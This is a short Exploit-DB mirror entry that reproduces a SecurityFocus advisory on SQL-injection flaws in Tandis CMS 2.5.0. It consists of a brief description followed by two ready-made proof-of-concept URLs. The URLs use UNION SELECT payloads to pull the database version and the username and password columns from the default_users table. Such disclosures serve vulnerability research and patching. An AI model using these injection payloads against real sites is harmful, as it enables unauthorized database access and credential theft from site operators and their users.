exploit-db-mirror/platforms/php/webapps/32533.txt
Offensive Security b4268e8a98 Updated 03_28_2014
2014-03-28 04:32:23 +00:00

11 lines
No EOL
721 B
Text
Executable file

source: http://www.securityfocus.com/bid/31930/info
Tandis CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Tandis CMS 2.5.0 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/index.php?mod=2&nid=-268)%20UNION%20ALL%20SELECT%20version(),0,0,concat(username,0x3a,userpass),0,0,0,0,0,0,0,0,0%20FROM%20default_users
http://www.example.com/[path]/index.php?mod=0&cpage=-114) UNION ALL SELECT 0,0,0,0,0,version()--